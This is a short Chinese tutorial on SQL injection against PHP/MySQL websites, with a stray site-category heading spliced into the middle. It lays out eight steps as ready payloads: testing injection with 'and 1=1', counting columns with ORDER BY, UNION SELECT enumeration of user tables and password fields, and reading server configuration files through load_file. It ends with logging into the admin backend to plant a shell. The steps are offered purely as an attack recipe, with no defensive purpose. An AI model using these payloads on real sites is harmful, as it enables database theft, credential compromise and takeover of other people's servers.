1~判斷注入點~ ：’;and 1=1;and 1=2                        -------（跟ASP一樣）

    2~判斷是否能進行UNION查詢~：and ord(mid(version(),1,1))>51                 -------（通過版本判斷4.0以上可用UNION查詢）

    3~利用order by 暴字段~：order by X                                                            -------（X為數(shù)字 如果返回正常則說明字段大于X）

    4~利用union來查詢準確字段~： and 1=2 union select 1,2,3,.......                 -------（返回正常，就說明猜到準確字段數(shù)，

教你幾步輕松學(xué)會PHP腳本注入

電腦資料

    5~判斷數(shù)據(jù)庫連接帳號有沒有寫權(quán)限~：and (select count(*) from mysql.user)>0 ------- （如果返回錯誤我們就猜管理員的帳號密碼如果返回正常，則可以通過

    and 1=2 union select 1,2,3,4,5,6, load_file(char(文件路徑的ascii值，用逗號隔開)),8,9,10 [注意：load_file(char(文件路徑的ascii值，用逗號隔開))也可以用十六進制，通過這種方式讀取配置文件]）

    6~猜解XXXX表~：and 1=2 union select 1,2,3,4,5,6.... from user                 --------（XXXX為表單名，返回正常，說明存在這個表）

    7~猜XXX字段~：and 1=2 union select 1,username,3,4,5,6.... from XXXX     -------（同樣道理，自己替換，如果在2字段顯示出字段內(nèi)容則存在些字段）

    8~同理再猜解password字段,猜解成功再找后臺登錄上SHELL~